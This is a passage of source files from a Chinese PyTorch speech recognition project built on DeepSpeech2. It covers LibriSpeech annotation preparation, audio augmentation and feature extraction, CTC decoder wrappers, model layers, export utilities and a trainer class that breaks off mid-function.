def create_annotation_text(data_dir, annotation_path):
print('Create Librispeech annotation text ...')
if not os.path.exists(annotation_path):
os.makedirs(annotation_path)
if not os.path.exists(os.path.join(annotation_path, 'librispeech.txt')):
f_train = open(os.path.join(annotation_path, 'librispeech.txt'), 'w', encoding='utf-8')
else:
f_train = open(os.path.join(annotation_path, 'librispeech.txt'), 'a', encoding='utf-8')
if not os.path.exists(os.path.join(annotation_path, 'test.txt')):
f_test = open(os.path.join(annotation_path, 'test.txt'), 'w', encoding='utf-8')
else:
f_test = open(os.path.join(annotation_path, 'test.txt'), 'a', encoding='utf-8')
for subfolder, _, filelist in sorted(os.walk(data_dir)):
text_filelist = [filename for filename in filelist if filename.endswith('trans.txt')]
if len(text_filelist) > 0:
text_filepath = os.path.join(subfolder, text_filelist[0])
for line in io.open(text_filepath, encoding="utf8"):
segments = line.strip().split()
text = ' '.join(segments[1:]).lower()
audio_filepath = os.path.join(subfolder, segments[0] + '.flac')
if 'test-clean' not in subfolder and 'test-other' not in subfolder and \
'dev-clean' not in subfolder and 'dev-other' not in subfolder:
f_train.write(audio_filepath[3:] + '\t' + text + '\n')
else:
if 'test-clean' in subfolder:
f_test.write(audio_filepath[3:] + '\t' + text + '\n')
f_test.close()
f_train.close()
def prepare_dataset(url, md5sum, target_dir, annotation_path):
"""Download, unpack and create summmary manifest file."""
data_dir = os.path.join(target_dir, 'LibriSpeech')
# download
filepath = download(url, md5sum, target_dir)
# unpack
unpack(filepath, target_dir)
create_annotation_text(data_dir, annotation_path)
def main():
if args.target_dir.startswith('~'):
args.target_dir = os.path.expanduser(args.target_dir)
prepare_dataset(url=URL_TEST_CLEAN,
md5sum=MD5_TEST_CLEAN,
target_dir=args.target_dir,
annotation_path=args.annotation_text)
prepare_dataset(url=URL_DEV_CLEAN,
md5sum=MD5_DEV_CLEAN,
target_dir=args.target_dir,
annotation_path=args.annotation_text)
prepare_dataset(url=URL_TRAIN_CLEAN_100,
md5sum=MD5_TRAIN_CLEAN_100,
target_dir=args.target_dir,
annotation_path=args.annotation_text)
prepare_dataset(url=URL_TEST_OTHER,
md5sum=MD5_TEST_OTHER,
target_dir=args.target_dir,
annotation_path=args.annotation_text)
prepare_dataset(url=URL_DEV_OTHER,
md5sum=MD5_DEV_OTHER,
target_dir=args.target_dir,
annotation_path=args.annotation_text)
prepare_dataset(url=URL_TRAIN_CLEAN_360,
md5sum=MD5_TRAIN_CLEAN_360,
target_dir=args.target_dir,
annotation_path=args.annotation_text)
prepare_dataset(url=URL_TRAIN_OTHER_500,
md5sum=MD5_TRAIN_OTHER_500,
target_dir=args.target_dir,
annotation_path=args.annotation_text)
if __name__ == '__main__':
main()
```
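Each line that `create_annotation_text` writes is an audio path and its lower-cased transcript separated by a tab. A small reader sketch for such a list (the file name is simply the one produced above; nothing else is assumed):

```python
def load_annotation(path):
    """Return (audio_path, transcript) pairs from a tab-separated annotation file."""
    pairs = []
    with open(path, encoding='utf-8') as f:
        for line in f:
            line = line.strip()
            if not line:
                continue
            audio_path, transcript = line.split('\t', 1)
            pairs.append((audio_path, transcript))
    return pairs

# e.g. pairs = load_annotation('../dataset/annotation/librispeech.txt')
```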
#### File: data_utils/augmentor/volume_perturb.py
```python
from masr.data_utils.augmentor.base import AugmentorBase
class VolumePerturbAugmentor(AugmentorBase):
"""添加随机体积扰动的增强模型
This is used for multi-loudness training of PCEN. See
https://arxiv.org/pdf/1607.05666v1.pdf
for more details.
:param rng: Random generator object.
:type rng: random.Random
:param min_gain_dBFS: Minimal gain in dBFS.
:type min_gain_dBFS: float
:param max_gain_dBFS: Maximal gain in dBFS.
:type max_gain_dBFS: float
"""
def __init__(self, rng, min_gain_dBFS, max_gain_dBFS):
self._min_gain_dBFS = min_gain_dBFS
self._max_gain_dBFS = max_gain_dBFS
self._rng = rng
def transform_audio(self, audio_segment):
"""Change audio loadness.
Note that this is an in-place transformation.
:param audio_segment: Audio segment to add effects to.
:type audio_segment: AudioSegmenet|SpeechSegment
"""
gain = self._rng.uniform(self._min_gain_dBFS, self._max_gain_dBFS)
audio_segment.gain_db(gain)
```
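A quick usage sketch of the augmentor. The `FakeSegment` class is only a stand-in so the example runs without a real `AudioSegment`; the one assumption is that the `masr` package is importable as in the file above:

```python
import random

from masr.data_utils.augmentor.volume_perturb import VolumePerturbAugmentor

class FakeSegment:
    """Stand-in for AudioSegment: it just records the gain that gets applied."""
    def __init__(self):
        self.applied_gain = 0.0

    def gain_db(self, gain):
        self.applied_gain += gain

augmentor = VolumePerturbAugmentor(rng=random.Random(0), min_gain_dBFS=-10, max_gain_dBFS=10)
segment = FakeSegment()
augmentor.transform_audio(segment)
print(segment.applied_gain)  # a value drawn uniformly from [-10, 10] dBFS
```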
#### File: data_utils/featurizer/audio_featurizer.py
```python
import numpy as np
from python_speech_features import delta
from python_speech_features import logfbank
from python_speech_features import mfcc
from masr.data_utils.audio import AudioSegment
class AudioFeaturizer(object):
"""音频特征器,用于从AudioSegment或SpeechSegment内容中提取特性。
Currently, it supports feature types of linear spectrogram and mfcc.
:param stride_ms: Striding size (in milliseconds) for generating frames.
:type stride_ms: float
:param window_ms: Window size (in milliseconds) for generating frames.
:type window_ms: float
:param target_sample_rate: Audio are resampled (if upsampling or
downsampling is allowed) to this before
extracting spectrogram features.
:type target_sample_rate: int
:param use_dB_normalization: Whether to normalize the audio to a certain
decibels before extracting the features.
:type use_dB_normalization: bool
:param target_dB: Target audio decibels for normalization.
:type target_dB: float
"""
def __init__(self,
feature_method='linear',
stride_ms=10.0,
window_ms=20.0,
target_sample_rate=16000,
use_dB_normalization=True,
target_dB=-20):
self._feature_method = feature_method
self._stride_ms = stride_ms
self._window_ms = window_ms
self._target_sample_rate = target_sample_rate
self._use_dB_normalization = use_dB_normalization
self._target_dB = target_dB
def featurize(self, audio_segment, allow_downsampling=True, allow_upsampling=True):
"""从AudioSegment或SpeechSegment中提取音频特征
:param audio_segment: Audio/speech segment to extract features from.
:type audio_segment: AudioSegment|SpeechSegment
:param allow_downsampling: Whether to allow audio downsampling before featurizing.
:type allow_downsampling: bool
:param allow_upsampling: Whether to allow audio upsampling before featurizing.
:type allow_upsampling: bool
:return: Spectrogram audio feature in 2darray.
:rtype: ndarray
:raises ValueError: If audio sample rate is not supported.
"""
# upsampling or downsampling
if ((audio_segment.sample_rate > self._target_sample_rate and
allow_downsampling) or
(audio_segment.sample_rate < self._target_sample_rate and
allow_upsampling)):
audio_segment.resample(self._target_sample_rate)
if audio_segment.sample_rate != self._target_sample_rate:
raise ValueError("Audio sample rate is not supported. "
"Turn allow_downsampling or allow up_sampling on.")
# decibel normalization
if self._use_dB_normalization:
audio_segment.normalize(target_db=self._target_dB)
# extract spectrogram
if self._feature_method == 'linear':
return self._compute_linear(audio_segment.samples, audio_segment.sample_rate,
stride_ms=self._stride_ms, window_ms=self._window_ms)
elif self._feature_method == 'mfcc':
samples = audio_segment.to('int16')
return self._compute_mfcc(samples=samples, sample_rate=audio_segment.sample_rate,
stride_ms=self._stride_ms, window_ms=self._window_ms)
elif self._feature_method == 'fbank':
samples = audio_segment.to('int16')
return self._compute_fbank(samples=samples, sample_rate=audio_segment.sample_rate,
stride_ms=self._stride_ms, window_ms=self._window_ms)
else:
raise Exception('Unknown preprocessing method: {}'.format(self._feature_method))
# Compute the linear spectrogram with the fast Fourier transform
@staticmethod
def _compute_linear(samples, sample_rate, stride_ms=10.0, window_ms=20.0, eps=1e-14):
stride_size = int(0.001 * sample_rate * stride_ms)
window_size = int(0.001 * sample_rate * window_ms)
truncate_size = (len(samples) - window_size) % stride_size
samples = samples[:len(samples) - truncate_size]
nshape = (window_size, (len(samples) - window_size) // stride_size + 1)
nstrides = (samples.strides[0], samples.strides[0] * stride_size)
windows = np.lib.stride_tricks.as_strided(samples, shape=nshape, strides=nstrides)
assert np.all(windows[:, 1] == samples[stride_size:(stride_size + window_size)])
# Fast Fourier transform
weighting = np.hanning(window_size)[:, None]
fft = np.fft.rfft(windows * weighting, n=None, axis=0)
fft = np.absolute(fft)
fft = fft ** 2
scale = np.sum(weighting ** 2) * sample_rate
fft[1:-1, :] *= (2.0 / scale)
fft[(0, -1), :] /= scale
freqs = float(sample_rate) / window_size * np.arange(fft.shape[0])
ind = np.where(freqs <= (sample_rate / 2))[0][-1] + 1
linear_feat = np.log(fft[:ind, :] + eps) # dim=161
return linear_feat
@staticmethod
def _compute_mfcc(samples, sample_rate, stride_ms=10.0, window_ms=25.0):
# Compute MFCC features
mfcc_feat = mfcc(signal=samples,
samplerate=sample_rate,
winlen=0.001 * window_ms,
winstep=0.001 * stride_ms,
highfreq=(sample_rate / 2))
# Deltas
d_feat = delta(mfcc_feat, 2)
# Delta-Deltas, computed from the first-order deltas
dd_feat = delta(d_feat, 2)
# concat above three features
mfcc_feat = np.concatenate((mfcc_feat, d_feat, dd_feat), axis=1) # dim=39
mfcc_feat = mfcc_feat.transpose([1, 0])
return mfcc_feat
def _compute_fbank(self,
samples,
sample_rate,
stride_ms=10.0,
window_ms=25.0):
# Compute filter-bank (fbank) features
fbank_feat = logfbank(signal=samples,
samplerate=sample_rate,
winlen=0.001 * window_ms,
winstep=0.001 * stride_ms,
lowfreq=20,
highfreq=(sample_rate / 2),
wintype='povey')
# Deltas
d_feat = delta(fbank_feat, 2)
# Delta-Deltas, computed from the first-order deltas
dd_feat = delta(d_feat, 2)
# concat above three features
fbank_feat = np.concatenate((fbank_feat, d_feat, dd_feat), axis=1) # dim=120
fbank_feat = fbank_feat.transpose([1, 0])
return fbank_feat
@property
def feature_dim(self):
"""返回特征大小
:return: 特征大小
:rtype: int
"""
if self._feature_method == 'linear':
return 161
elif self._feature_method == 'mfcc':
return 39
elif self._feature_method == 'fbank':
return 120
else:
raise Exception('No such preprocessing method: {}'.format(self._feature_method))
```
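A minimal usage sketch of the featurizer above; the wav path is a placeholder and `AudioSegment.from_file` is assumed to be the usual loading helper in `masr.data_utils.audio`.
```python
from masr.data_utils.audio import AudioSegment
from masr.data_utils.featurizer.audio_featurizer import AudioFeaturizer

featurizer = AudioFeaturizer(feature_method='linear')      # 161-dim linear spectrogram

# 'example.wav' is a placeholder; AudioSegment.from_file is assumed here.
segment = AudioSegment.from_file('example.wav')
feat = featurizer.featurize(segment)                       # ndarray of shape (feature_dim, num_frames)
print(feat.shape, featurizer.feature_dim)
```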
#### File: masr/decoders/swig_wrapper.py
```python
import swig_decoders
class Scorer(swig_decoders.Scorer):
"""Wrapper for Scorer.
:param alpha: Parameter associated with the language model. Set alpha = 0 to disable the language model.
:type alpha: float
:param beta: Parameter associated with word counting. Set beta = 0 to disable word counting.
:type beta: float
:param model_path: Path to the language model.
:type model_path: str
"""
def __init__(self, alpha, beta, model_path, vocabulary):
swig_decoders.Scorer.__init__(self, alpha, beta, model_path, vocabulary)
def ctc_greedy_decoder(probs_seq, vocabulary, blank_id):
"""CTC贪婪(最佳路径)解码器
由最可能的令牌组成的路径将被进一步后处理到去掉连续重复和所有空白
:param probs_seq: 每一条都是2D的概率表。每个元素都是浮点数概率的列表一个字符
:type probs_seq: numpy.ndarray
:param vocabulary: 词汇列表
:type vocabulary: list
:param blank_index 需要移除的空白索引
:type blank_index int
:return: 解码后得到的字符串
:rtype: baseline
"""
result = swig_decoders.ctc_greedy_decoder(probs_seq.tolist(), vocabulary, blank_id)
return result
def ctc_beam_search_decoder(probs_seq,
vocabulary,
beam_size,
cutoff_prob=1.0,
cutoff_top_n=40,
blank_id=0,
ext_scoring_func=None):
"""集束搜索解码器
:param probs_seq: 单个2-D概率分布列表,每个元素是词汇表和空白上的标准化概率列表
:type probs_seq: 2-D list
:param vocabulary: 词汇列表
:type vocabulary: list
:param beam_size: 集束搜索宽度
:type beam_size: int
:param cutoff_prob: 剪枝中的截断概率,默认1.0,没有剪枝
:type cutoff_prob: float
:param cutoff_top_n: 剪枝时的截断数,仅在词汇表中具有最大probs的cutoff_top_n字符用于光束搜索,默认为40
:type cutoff_top_n: int
:param blank_id 空白索引
:type blank_id int
:param ext_scoring_func: 外部评分功能部分解码句子,如字计数或语言模型
:type ext_scoring_func: callable
:return: 解码结果为log概率和句子的元组列表,按概率降序排列
:rtype: list
"""
beam_results = swig_decoders.ctc_beam_search_decoder(
probs_seq.tolist(), vocabulary, beam_size, cutoff_prob, cutoff_top_n, ext_scoring_func, blank_id)
beam_results = [(res[0], res[1]) for res in beam_results]
return beam_results
def ctc_beam_search_decoder_batch(probs_split,
vocabulary,
beam_size,
num_processes,
cutoff_prob=1.0,
cutoff_top_n=40,
blank_id=0,
ext_scoring_func=None):
"""Wrapper for the batched CTC beam search decoder.
:param probs_seq: 3-D列表,每个元素作为ctc_beam_search_decoder()使用的2-D概率列表的实例
:type probs_seq: 3-D list
:param vocabulary: 词汇列表
:type vocabulary: list
:param beam_size: 集束搜索宽度
:type beam_size: int
:param cutoff_prob: 剪枝中的截断概率,默认1.0,没有剪枝
:type cutoff_prob: float
:param cutoff_top_n: 剪枝时的截断数,仅在词汇表中具有最大probs的cutoff_top_n字符用于光束搜索,默认为40
:type cutoff_top_n: int
:param blank_id 空白索引
:type blank_id int
:param num_processes: 并行解码进程数
:type num_processes: int
:param ext_scoring_func: 外部评分功能部分解码句子,如字计数或语言模型
:type ext_scoring_func: callable
:return: 解码结果为log概率和句子的元组列表,按概率降序排列的列表
:rtype: list
"""
probs_split = [probs_seq.tolist() for probs_seq in probs_split]
batch_beam_results = swig_decoders.ctc_beam_search_decoder_batch(
probs_split, vocabulary, beam_size, num_processes, cutoff_prob,
cutoff_top_n, ext_scoring_func, blank_id)
batch_beam_results = [[(res[0], res[1]) for res in beam_results]
for beam_results in batch_beam_results]
return batch_beam_results
```
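To make the greedy decoding rule concrete without the compiled swig_decoders module, here is a small numpy sketch of the same collapse-repeats-then-drop-blanks post-processing, using a toy vocabulary and probabilities for illustration only.
```python
import numpy as np

def greedy_decode(probs_seq, vocabulary, blank_id=0):
    best_path = np.argmax(probs_seq, axis=1)                    # best token per time step
    collapsed = [t for i, t in enumerate(best_path)             # collapse consecutive repeats
                 if i == 0 or t != best_path[i - 1]]
    return ''.join(vocabulary[t] for t in collapsed if t != blank_id)  # drop blanks

vocab = ['<blank>', 'a', 'b', 'c']
probs = np.array([[0.1, 0.7, 0.1, 0.1],    # a
                  [0.1, 0.7, 0.1, 0.1],    # a (repeat, collapsed)
                  [0.8, 0.1, 0.05, 0.05],  # blank
                  [0.1, 0.1, 0.1, 0.7]])   # c
print(greedy_decode(probs, vocab))         # -> "ac"
```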
#### File: model_utils/deepspeech2/conv.py
```python
from torch import nn
__all__ = ['ConvStack']
class ConvBn(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride, input_dim):
super().__init__()
self.kernel_size = kernel_size
self.stride = stride
self.conv = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride)
self.act = nn.GELU()
# self.dropout = nn.Dropout()
self.output_dim = (input_dim - self.kernel_size) // self.stride + 1
def forward(self, x, x_len):
x = self.conv(x)
x = self.act(x)
# x = self.dropout(x)
x_len = ((x_len - self.kernel_size) / self.stride + 1).int()
return x, x_len
class ConvStack(nn.Module):
"""具有堆叠卷积层的卷积组
:param feat_size: 输入音频的特征大小
:type feat_size: int
:param conv_out_channels: 卷积层输出大小
:type conv_out_channels: int
"""
def __init__(self, feat_size, conv_out_channels):
super().__init__()
self.conv1 = ConvBn(in_channels=1,
out_channels=conv_out_channels,
kernel_size=3,
stride=2,
input_dim=feat_size)
self.conv2 = ConvBn(in_channels=conv_out_channels,
out_channels=conv_out_channels,
kernel_size=3,
stride=2,
input_dim=self.conv1.output_dim)
self.output_dim = self.conv2.output_dim * conv_out_channels
def forward(self, x, x_len):
"""
x: shape [B, D, T]
x_len : shape [B]
"""
# [B, D, T] -> [B, T, D]
x = x.permute(0, 2, 1)
# [B, T, D] -> [B, C=1, T, D]
x = x.unsqueeze(1)
x, x_len = self.conv1(x, x_len)
x, x_len = self.conv2(x, x_len)
# Convert the convolutional feature maps into a sequence of vectors
x = x.permute(0, 2, 1, 3) # [B, T, C, D]
x = x.reshape([x.shape[0], x.shape[1], -1]) # [B, T, C*D]
return x, x_len
```
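A small sketch of the shape flow through ConvStack; the 161-dim linear features, 32 output channels and batch of lengths are assumed values for illustration.
```python
import torch

from masr.model_utils.deepspeech2.conv import ConvStack

conv_stack = ConvStack(feat_size=161, conv_out_channels=32)   # assumed sizes

x = torch.randn(4, 161, 300)                                  # [B, D, T]
x_len = torch.tensor([300, 280, 260, 240])
out, out_len = conv_stack(x, x_len)
# Two (kernel=3, stride=2) convs: D 161 -> 80 -> 39, T 300 -> 149 -> 74.
print(out.shape, conv_stack.output_dim)                       # torch.Size([4, 74, 1248]) 1248
```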
#### File: masr/model_utils/utils.py
```python
import math
import torch
from torch import nn
from masr.model_utils.deepspeech2.model import DeepSpeech2Model
__all__ = ['Normalizer', 'DeepSpeech2ModelExport']
# Model that normalizes the input features
class Normalizer(nn.Module):
def __init__(self, mean, std):
super().__init__()
self.mean = mean
self.std = std
self.eps = 1e-20
def forward(self, x):
x = (x - self.mean) / (self.std + self.eps)
return x
# DeepSpeech2Model wrapper used for export
class DeepSpeech2ModelExport(torch.nn.Module):
def __init__(self, model:DeepSpeech2Model, feature_mean, feature_std):
super(DeepSpeech2ModelExport, self).__init__()
self.normalizer = Normalizer(feature_mean, feature_std)
self.model = model
# Add a Softmax layer on top of the output
self.softmax = torch.nn.Softmax(dim=2)
def forward(self, audio, audio_len, init_state_h_box):
x = self.normalizer(audio)
logits, _, final_chunk_state_h_box = self.model(x, audio_len, init_state_h_box)
output = self.softmax(logits)
return output, final_chunk_state_h_box
class LinearSpecgram(nn.Module):
def __init__(self, stride_ms=10.0, window_ms=20.0, audio_rate=16000, use_db_normalization=True, target_db=-20):
super().__init__()
self._stride_ms = stride_ms
self._window_ms = window_ms
self._audio_rate = audio_rate
self._use_dB_normalization = use_db_normalization
self._target_dB = target_db
self._eps = 1e-14
self._stride_size = int(0.001 * self._audio_rate * self._stride_ms)
self._window_size = int(0.001 * self._audio_rate * self._window_ms)
def forward(self, audio):
audio = audio.to(torch.float64)
audio = self.normalize(audio)
truncate_size = (audio.shape[-1] - self._window_size) % self._stride_size
audio = audio[:audio.shape[-1] - truncate_size]
windows = self.as_strided(audio, kernel_size=self._window_size, strides=self._stride_size)
weighting = self.hanning(self._window_size)[:, None]
# Fast Fourier transform
fft = torch.fft.rfft(windows * weighting, n=None, dim=0)
fft = torch.abs(fft)
fft = fft ** 2
scale = torch.sum(weighting ** 2) * self._audio_rate
fft[1:-1, :] *= (2.0 / scale)
fft[0, :] /= scale
fft[-1, :] /= scale
return torch.log(fft + self._eps)
def normalize(self, audio, max_gain_db=300.0):
"""将音频归一化,使其具有所需的有效值(以分贝为单位)"""
gain = self._target_dB - self.rms_db(audio)
return self.gain_db(audio, min(max_gain_db, gain))
@staticmethod
def gain_db(audio, gain):
"""对音频施加分贝增益"""
audio *= 10. ** (gain / 20.)
return audio
@staticmethod
def rms_db(audio):
"""返回以分贝为单位的音频均方根能量"""
mean_square = torch.mean(audio ** 2)
return 10 * torch.log10(mean_square)
@staticmethod
def as_strided(x, kernel_size, strides): # x.shape[L] kernel_size=320, strides=160
x = x.unsqueeze(0).unsqueeze(0).unsqueeze(0)
x = torch.nn.functional.unfold(x, kernel_size=[1, kernel_size], stride=strides)
x = x.squeeze(0)
return x
@staticmethod
def hanning(M): # M=320
pi = torch.tensor(math.pi)
n = torch.arange(1 - M, M, 2)
k = pi * n / (M - 1)
return 0.5 + 0.5 * torch.cos(k)
```
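A minimal sketch of the Normalizer above; the feature layout and the per-dimension statistics are assumptions for illustration (in the real pipeline, mean and std come from FeatureNormalizer).
```python
import torch

from masr.model_utils.utils import Normalizer

# Assumed statistics; shaped [D, 1] so they broadcast over a [B, D, T] batch.
mean = torch.zeros(161, 1)
std = torch.ones(161, 1)

normalizer = Normalizer(mean, std)
feats = torch.randn(4, 161, 300)          # [B, D, T] batch of spectrogram features
normalized = normalizer(feats)            # (feats - mean) / (std + eps)
```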
#### File: masr/masr/trainer.py
```python
import io
import json
import os
import platform
import shutil
import sys
import time
from collections import Counter
from datetime import datetime
from datetime import timedelta
import torch
import torch.distributed as dist
from torch.optim.lr_scheduler import StepLR
from torch.utils.data import DataLoader
from tqdm import tqdm
from visualdl import LogWriter
from masr.data_utils.collate_fn import collate_fn
from masr.data_utils.featurizer.audio_featurizer import AudioFeaturizer
from masr.data_utils.featurizer.text_featurizer import TextFeaturizer
from masr.data_utils.normalizer import FeatureNormalizer
from masr.data_utils.reader import MASRDataset
from masr.data_utils.sampler import DSRandomSampler, DSElasticDistributedSampler
from masr.decoders.ctc_greedy_decoder import greedy_decoder_batch
from masr.model_utils.deepspeech2.model import DeepSpeech2Model
from masr.model_utils.utils import DeepSpeech2ModelExport
from masr.utils.metrics import cer, wer
from masr.utils.utils import create_manifest, create_noise, count_manifest, compute_mean_std
from masr.utils.utils import labels_to_string
class MASRTrainer(object):
def __init__(self,
use_model='deepspeech2',
feature_method='linear',
mean_std_path='dataset/mean_std.npz',
train_manifest='dataset/manifest.train',
test_manifest='dataset/manifest.test',
dataset_vocab='dataset/vocabulary.txt',
num_workers=8,
alpha=2.2,
beta=4.3,
beam_size=300,
num_proc_bsearch=10,
cutoff_prob=0.99,
cutoff_top_n=40,
decoder='ctc_greedy',
metrics_type='cer',
lang_model_path='lm/zh_giga.no_cna_cmn.prune01244.klm'):
"""
PPASR integrated utility class
:param use_model: Model to use
:param feature_method: Preprocessing (feature) method to use
:param mean_std_path: Path to the file with the dataset mean and std values
:param train_manifest: Path to the training data manifest
:param test_manifest: Path to the test data manifest
:param dataset_vocab: Path to the dataset vocabulary
:param num_workers: Number of worker threads for reading data
:param alpha: LM weight for beam search
:param beta: Word-count weight for beam search
:param beam_size: Beam search width, range: [5, 500]
:param num_proc_bsearch: Number of CPU processes used by beam search
:param cutoff_prob: Cutoff probability for pruning
:param cutoff_top_n: Cutoff count for pruning
:param metrics_type: Error metric to use
:param decoder: Decoding method, supports ctc_beam_search and ctc_greedy
:param lang_model_path: Path to the language model file
"""
self.use_model = use_model
self.feature_method = feature_method
self.mean_std_path = mean_std_path
self.train_manifest = train_manifest
self.test_manifest = test_manifest
self.dataset_vocab = dataset_vocab
if platform.system().lower() == 'windows':
self.num_workers = 0
print('[{}] Multi-worker data loading is not supported on Windows, it has been disabled automatically!'.format(datetime.now()), file=sys.stderr)
else:
self.num_workers = num_workers
self.alpha = alpha
self.beta = beta
self.beam_size = beam_size
self.num_proc_bsearch = num_proc_bsearch
self.cutoff_prob = cutoff_prob
self.cutoff_top_n = cutoff_top_n
self.decoder = decoder
self.metrics_type = metrics_type
self.lang_model_path = lang_model_path
self.beam_search_decoder = None
def create_data(self,
annotation_path='dataset/annotation/',
noise_manifest_path='dataset/manifest.noise',
noise_path='dataset/audio/noise',
num_samples=1000000,
count_threshold=2,
is_change_frame_rate=True,
max_test_manifest=10000):
"""
创建数据列表和词汇表
:param annotation_path: 标注文件的路径
:param noise_manifest_path: 噪声数据列表的路径
:param noise_path: 噪声音频存放的文件夹路径
:param num_samples: 用于计算均值和标准值得音频数量,当为-1使用全部数据
:param count_threshold: 字符计数的截断阈值,0为不做限制
:param is_change_frame_rate: 是否统一改变音频为16000Hz,这会消耗大量的时间
:param max_test_manifest: 生成测试数据列表的最大数量,如果annotation_path包含了test.txt,就全部使用test.txt的数据
"""
print('开始生成数据列表...')
create_manifest(annotation_path=annotation_path,
train_manifest_path=self.train_manifest,
test_manifest_path=self.test_manifest,
is_change_frame_rate=is_change_frame_rate,
max_test_manifest=max_test_manifest)
print('=' * 70)
print('Generating noise data manifest...')
create_noise(path=noise_path,
noise_manifest_path=noise_manifest_path,
is_change_frame_rate=is_change_frame_rate)
print('=' * 70)
print('Generating the vocabulary...')
counter = Counter()
count_manifest(counter, self.train_manifest)
count_sorted = sorted(counter.items(), key=lambda x: x[1], reverse=True)
with open(self.dataset_vocab, 'w', encoding='utf-8') as fout:
fout.write('<blank>\t-1\n')
for char, count in count_sorted:
if char == ' ': char = '<space>'
# Stop at the character count threshold; characters with lower counts are ignored
if count < count_threshold: break
fout.write('%s\t%d\n' % (char, count))
print('Vocabulary generated!')
print('=' * 70)
print('Sampling {} items to compute the mean and std values...'.format(num_samples))
compute_mean_std(feature_method=self.feature_method,
manifest_path=self.train_manifest,
output_path=self.mean_std_path,
num_samples=num_samples,
num_workers=self.num_workers)
def evaluate(self,
batch_size=32,
min_duration=0,
max_duration=-1,
resume_model='models/deepspeech2/best_model/'):
"""
评估模型
:param batch_size: 评估的批量大小
:param min_duration: 过滤最短的音频长度
:param max_duration: 过滤最长的音频长度,当为-1的时候不限制长度
:param resume_model: 所使用的模型
:return: 评估结果
"""
# 获取测试数据
test_dataset = MASRDataset(data_list=self.test_manifest,
vocab_filepath=self.dataset_vocab,
mean_std_filepath=self.mean_std_path,
feature_method=self.feature_method)
test_loader = DataLoader(dataset=test_dataset,
batch_size=batch_size,
collate_fn=collate_fn,
num_workers=self.num_workers)
# Build the model
if self.use_model == 'deepspeech2':
model = DeepSpeech2Model(feat_size=test_dataset.feature_dim, vocab_size=test_dataset.vocab_size)
else:
raise Exception('No such model: {}'.format(self.use_model))
assert os.path.exists(os.path.join(resume_model, 'model.pt')), "Model does not exist!"
model.load_state_dict(torch.load(os.path.join(resume_model, 'model.pt')))
model.eval()
c = []
for inputs, labels, input_lens, _ in tqdm(test_loader):
# Run recognition
outs, out_lens, _ = model(inputs, input_lens)
outs = torch.nn.functional.softmax(outs, 2)
# Decode to get the recognition result
outs = outs.cpu().detach().numpy()
out_strings = self.decoder_result(outs, out_lens, test_dataset.vocab_list)
labels_str = labels_to_string(labels.numpy(), test_dataset.vocab_list)
for out_string, label in zip(*(out_strings, labels_str)):
# Compute the character or word error rate
if self.metrics_type == 'wer':
c.append(wer(out_string, label))
else:
c.append(cer(out_string, label))
cer_result = float(sum(c) / len(c))
return cer_result
def train(self,
batch_size=32,
min_duration=0.5,
max_duration=20,
num_epoch=50,
learning_rate=5e-5,
save_model_path='models/',
resume_model=None,
pretrained_model=None,
augment_conf_path='conf/augmentation.json'):
"""
训练模型
:param batch_size: 训练的批量大小
:param min_duration: 过滤最短的音频长度
:param max_duration: 过滤最长的音频长度,当为-1的时候不限制长度
:param num_epoch: 训练的轮数
:param learning_rate: 初始学习率的大小
:param save_model_path: 模型保存的路径
:param resume_model: 恢复训练,当为None则不使用预训练模型
:param pretrained_model: 预训练模型的路径,当为None则不使用预训练模型
:param augment_conf_path: 数据增强的配置文件,为json格式
"""
# 获取有多少张显卡训练
nranks = torch.cuda.device_count()
local_rank = 0
if nranks > 1:
# Initialize the NCCL environment
dist.init_process_group(backend='nccl')
local_rank = dist.get_rank()
if local_rank == 0:
# Logger
writer = LogWriter(logdir='log')
# Load the training data
if augment_conf_path is not None and os.path.exists(augment_conf_path):
augmentation_config = io.open(augment_conf_path, mode='r', encoding='utf8').read()
else:
if augment_conf_path is not None and not os.path.exists(augment_conf_path):
print('[{}] Data augmentation config file {} does not exist'.format(datetime.now(), augment_conf_path), file=sys.stderr)
augmentation_config = '{}'
train_dataset = MASRDataset(data_list=self.train_manifest,
vocab_filepath=self.dataset_vocab,
feature_method=self.feature_method,
mean_std_filepath=self.mean_std_path,
min_duration=min_duration,
max_duration=max_duration,
augmentation_config=augmentation_config)
# Set up multi-GPU training
if nranks > 1:
train_batch_sampler = DSElasticDistributedSampler(train_dataset,
batch_size=batch_size,
sortagrad=True,
drop_last=True,
shuffle=True)
else:
train_batch_sampler = DSRandomSampler(train_dataset,
batch_size=batch_size,
sortagrad=True,
drop_last=True,
shuffle=True)
train_loader = DataLoader(dataset=train_dataset,
collate_fn=collate_fn,
batch_sampler=train_batch_sampler,
num_workers=self.num_workers)
# Load the test data
test_dataset = MASRDataset(data_list=self.test_manifest,
vocab_filepath=self.dataset_vocab,
feature_method=self.feature_method,
mean_std_filepath=self.mean_std_path,
min_duration=min_duration,
max_duration=max_duration)
test_loader = DataLoader(dataset=test_dataset,
batch_size=batch_size,
collate_fn=collate_fn,
num_workers=self.num_workers)
# Build the model
if self.use_model == 'deepspeech2':
model = DeepSpeech2Model(feat_size=train_dataset.feature_dim, vocab_size=train_dataset.vocab_size)
else:
raise Exception('No such model: {}'.format(self.use_model))
# Set up the optimizer
optimizer = torch.optim.AdamW(params=model.parameters(), lr=learning_rate, weight_decay=1e-6)
torch.cuda.set_device(local_rank)
model.cuda(local_rank)
if nranks > 1:
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[local_rank])
print('[{}] Training samples: {}'.format(datetime.now(), len(train_dataset)))
# Load the pretrained model
if pretrained_model is not None:
assert os.path.exists(os.path.join(pretrained_model, 'model.pt')), "Model parameter file does not exist!"
pretrained_dict = torch.load(os.path.join(pretrained_model, 'model.pt'))
model_dict = model.state_dict()
# Remove keys from pretrained_dict that are not in model_dict
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
model_dict.update(pretrained_dict)
model.load_state_dict(model_dict)
print('[{}] Successfully loaded pretrained model: {}'.format(datetime.now(), pretrained_model))
# Load the model to resume from
last_epoch = -1
last_model_dir = os.path.join(save_model_path, self.use_model, 'last_model')
if resume_model is not None or (os.path.exists(os.path.join(last_model_dir, 'model.pt'))
and os.path.exists(os.path.join(last_model_dir, 'optimizer.pt'))):
# Automatically pick the most recently saved model
if resume_model is None: resume_model = last_model_dir
assert os.path.exists(os.path.join(resume_model, 'model.pt')), "Model parameter file does not exist!"
assert os.path.exists(os.path.join(resume_model, 'optimizer.pt')), "Optimizer parameter file does not exist!"
if nranks > 1:
